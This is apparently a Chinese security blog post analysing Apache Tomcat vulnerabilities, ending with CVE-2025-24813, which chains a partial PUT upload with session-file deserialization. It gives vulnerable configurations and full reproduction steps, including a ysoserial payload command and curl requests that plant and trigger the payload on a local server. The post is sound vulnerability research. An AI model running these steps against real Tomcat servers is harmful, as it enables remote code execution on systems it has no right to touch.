<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="KaGty1" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      从Tomcat历史漏洞分析CVE-2025-24813 
      
      
      |
    
     KaGty1 &#39;s Personal Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/kagty1.jpg">
    <link rel="icon" href="/images/kagty1.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/kagty1.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">kagty1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">从Tomcat历史漏洞分析CVE-2025-24813</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2025-03-20 16:08:50
        </span>
        
      </div>
      <div class="markdown-body">
        <h4 id="环境与调试"><a href="#环境与调试" class="headerlink" title="环境与调试"></a>环境与调试</h4><p>(1) Tomcat各版本下载：<a target="_blank" rel="noopener" href="https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/">https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/</a></p>
<p>(2) IDEA远程JVM调试：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">首先在 /conf 目录下新建 setenv.sh文件</span><br><span class="line">其次写入命令: <span class="built_in">export</span> <span class="attribute">CATALINA_OPTS</span>=<span class="string">&quot;<span class="variable">$CATALINA_OPTS</span> -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000&quot;</span> 监听8000端口</span><br><span class="line">启动Tomcat - ./startup.sh <span class="built_in">run</span></span><br><span class="line">添加远程JVM调试 - localhost:8000</span><br></pre></td></tr></table></figure>



<h4 id="Tomcat-PUT-RCE"><a href="#Tomcat-PUT-RCE" class="headerlink" title="Tomcat PUT RCE"></a>Tomcat PUT RCE</h4><p><strong>CVE-2017-12615</strong></p>
<p>参考：<a target="_blank" rel="noopener" href="https://paper.seebug.org/399/">https://paper.seebug.org/399/</a></p>
<p>本质是利用构造特殊后缀名绕过<code>JSPServlet</code>的检测，执行<code>DefaultServlet</code>中的<code>doPut</code>逻辑，上传恶意<code>jsp</code>文件。</p>
<h4 id="Tomcat-Session反序列化"><a href="#Tomcat-Session反序列化" class="headerlink" title="Tomcat Session反序列化"></a>Tomcat Session反序列化</h4><p><strong>CVE-2020-9484</strong></p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">影响版本：</span><br><span class="line">Apache Tomcat <span class="number">10</span>.<span class="number">0</span>.<span class="number">0</span>-M<span class="number">1—10.0.0</span>-M4</span><br><span class="line">Apache Tomcat <span class="number">9</span>.<span class="number">0</span>.<span class="number">0</span>.M<span class="number">1—9.0.34</span></span><br><span class="line">Apache Tomcat <span class="number">8.5.0—8</span>.<span class="number">5</span>.<span class="number">54</span></span><br><span class="line">Apache Tomcat <span class="number">7.0.0—7</span>.<span class="number">0</span>.<span class="number">103</span></span><br></pre></td></tr></table></figure>

<p>首先在<code>/conf/context.xml</code>中开启会话管理器</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">Manager</span> <span class="attr">className</span>=<span class="string">&quot;org.apache.catalina.session.PersistentManager&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Store</span> <span class="attr">className</span>=<span class="string">&quot;org.apache.catalina.session.FileStore&quot;</span> <span class="attr">directory</span>=<span class="string">&quot;/Users/gehansheng/Desktop/Java代码审计/Tomcat历史漏洞分析/apache-tomcat-10.0.0-M4/sessionFile&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Manager</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>PersistentManager</code> 是 Tomcat 中的一种会话管理器，它允许 <strong>会话数据</strong> 在 Tomcat 重启或服务器停机时得以 <strong>持久化存储</strong>。默认情况下，Tomcat 的会话数据存储在内存中，但如果启用了 <strong>PersistentManager</strong>，会话数据会被写入到文件系统中，从而在 Tomcat 重启后保持会话状态。</p>
<p><code>className=&quot;org.apache.catalina.session.PersistentManager</code>指定了使用<code>PersistentManager</code>来管理会话。</p>
<p><code>FileStore</code> 是 <code>PersistentManager</code> 用来将会话数据存储到磁盘上的类。它将会话对象<strong>序列化</strong>为文件，存储在指定的目录中，支持跨服务器重启保持会话状态。</p>
<p><code>directory=&quot;/Users/gehansheng/Desktop/Java代码审计/Tomcat历史漏洞分析/apache-tomcat-10.0.0-M4/sessionFile&quot;</code>为指定存储会话数据的目录文件。</p>
<hr>
<p>既然<code>FileStore</code>会将会话数据序列化为文件，那么就会存在反序列化漏洞的风险，这个漏洞就是由此产生的。</p>
<hr>
<p>使用CC链验证漏洞，先在<code>/webapps/ROOT/WEB_INF/lib</code>下添加<code>commons-collections-3.2.1.jar</code>包的依赖，然后使用<code>ysoserial</code>生成含有恶意序列化内容的<code>payload.session</code>文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial-all.jar CommonsCollections1 &quot;open -a Calculator&quot; &gt; /Users/gehansheng/Desktop/Java代码审计/Tomcat历史 漏洞分析/apache-tomcat-10.0.0-M4/sessionFile/poc.session</span><br></pre></td></tr></table></figure>

<p>验证 - 命令执行</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320133035177.png" alt="image-20250320133035177"></p>
<p>反序列化<code>.session</code>序列化文件的函数为<code>org.apache.catalina.session.FileStore#load</code></p>
<p>调用逻辑大致如下</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">org<span class="selector-class">.apache</span><span class="selector-class">.catalina</span><span class="selector-class">.session</span>.FileStore<span class="selector-id">#load</span></span><br><span class="line">org<span class="selector-class">.apache</span><span class="selector-class">.catalina</span><span class="selector-class">.session</span>.StandardSession<span class="selector-id">#readObjectData</span></span><br><span class="line">org<span class="selector-class">.apache</span><span class="selector-class">.catalina</span><span class="selector-class">.session</span>.StandardSession<span class="selector-id">#doReadObject</span></span><br><span class="line">java<span class="selector-class">.io</span>.ObjectInputStream<span class="selector-id">#readObject</span>()</span><br></pre></td></tr></table></figure>

<p>总结来看，这个漏洞的利用条件很高</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(<span class="number">1</span>) 文件上传路径与文件内容攻击者可控</span><br><span class="line">(<span class="number">2</span>) directory具体路径攻击者已知</span><br></pre></td></tr></table></figure>



<h4 id="Tomcat-文件上传-session反序列化"><a href="#Tomcat-文件上传-session反序列化" class="headerlink" title="Tomcat 文件上传 + session反序列化"></a>Tomcat 文件上传 + session反序列化</h4><p><strong>CVE-2025-24813</strong></p>
<figure class="highlight fix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">影响版本:</span></span><br><span class="line"><span class="attr">9.0.0.M1 &lt;</span>=<span class="string"> tomcat &lt;= 9.0.98</span></span><br><span class="line"><span class="string">10.1.0-M1 &lt;= tomcat &lt;= 10.1.34</span></span><br><span class="line"><span class="string">11.0.0-M1 &lt;= tomcat &lt;= 11.0.2</span></span><br></pre></td></tr></table></figure>

<p>利用条件是 <strong>CVE-2017-12615</strong> 和 <strong>CVE-2020-9484</strong> 的汇总</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">同时开启PUT和会话存储机制</span><br><span class="line"><span class="tag">&lt;<span class="name">init-param</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">param-name</span>&gt;</span>readonly<span class="tag">&lt;/<span class="name">param-name</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">param-value</span>&gt;</span>false<span class="tag">&lt;/<span class="name">param-value</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">init-param</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">Manager</span> <span class="attr">className</span>=<span class="string">&quot;org.apache.catalina.session.PersistentManager&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Store</span> <span class="attr">className</span>=<span class="string">&quot;org.apache.catalina.session.FileStore&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Manager</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>漏洞流程大约如下</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">当 PUT <span class="regexp">/1.txt时 -&gt; /</span>webapps<span class="regexp">/ROOT/</span><span class="number">1</span>.txt</span><br><span class="line">当 PUT <span class="regexp">/xxxxxx/</span>session -&gt; <span class="regexp">/work/</span>Catalina<span class="regexp">/localhost/</span>ROOT/.xxxxxx.session</span><br><span class="line"></span><br><span class="line">&lt;Store className=<span class="string">&quot;org.apache.catalina.session.FileStore&quot;</span><span class="regexp">/&gt;未显示指定dectionary路径时，默认指向/</span>work<span class="regexp">/Catalina/</span>localhost<span class="regexp">/ROOT/</span>目录</span><br><span class="line"></span><br><span class="line">org.apache.catalina.session.FileStore<span class="comment">#load (CVE-2020-9484)反序列化.xxxxxx.session文件-&gt;RCE</span></span><br></pre></td></tr></table></figure>

<p><code>PUT /xxxxxx/session -&gt; /work/Catalina/localhost/ROOT/.xxxxxx.session</code>的逻辑发生在<code>org.apache.catalina.servlets.DefaultServlet#executePartialPut</code>中</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320154530586.png" alt="image-20250320154530586"></p>
<p>走到<code>if</code>中的前提条件是<code>range</code>不为空，跟进<code>org.apache.catalina.servlets.DefaultServlet#parseContentRange</code>，发现其为<code>Content-Range</code>请求头</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320154807128.png" alt="image-20250320154807128"></p>
<p>构造请求头即可</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320154744428.png" alt="image-20250320154744428"></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320154822178.png" alt="image-20250320154822178"></p>
<p>那么只需要<code>PUT</code>恶意序列化字节码，就可以出发反序列化RCE了。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(<span class="number">1</span>) 使用ysoserial生成CC1链到payload.txt</span><br><span class="line">java -jar ysoserial-all.jar CommonsCollection1 <span class="string">&quot;open -a Calculator&quot;</span> &gt; <span class="regexp">/Users/g</span>ehansheng<span class="regexp">/Desktop/</span>Java代码审计<span class="regexp">/Tomcat历史漏洞分析/</span>Payload/payload.txt</span><br><span class="line"></span><br><span class="line">(<span class="number">2</span>) curl -X PUT http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span>:<span class="number">9090</span><span class="regexp">/xxxxxx/</span>session -H <span class="string">&quot;Content-Range: bytes 0-1800/2000&quot;</span> --data-binary @<span class="string">&quot;/Users/gehansheng/Desktop/Java代码审计/Tomcat历史漏洞分析/Payload/payload.txt&quot;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">3</span>) curl -X GET <span class="string">&quot;http://127.0.0.1:9090/&quot;</span> -H <span class="string">&quot;Cookie: JSESSIONID=.xxxxxx&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250320160611054.png" alt="image-20250320160611054"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2025/03/18/WIZCTF%20The%20Big%20IAM%20Challenges/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2025-03-20 16:08:50
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2025/03/24/SnakeYaml%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E4%B8%8E%E8%B0%83%E8%AF%95"><span class="toc-text">环境与调试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Tomcat-PUT-RCE"><span class="toc-text">Tomcat PUT RCE</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Tomcat-Session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-text">Tomcat Session反序列化</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Tomcat-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-text">Tomcat 文件上传 + session反序列化</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/KaGty1">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2025 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E4%BB%8ETomcat%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90CVE-2025-24813 + '&url=' + http%3A%2F%2Fkagty1.github.io%2F2025%2F03%2F20%2FTomcat-PUT%25E5%2588%2586%25E6%259E%2590%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://kagty1.github.io/2025/03/20/Tomcat-PUT%E5%88%86%E6%9E%90/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
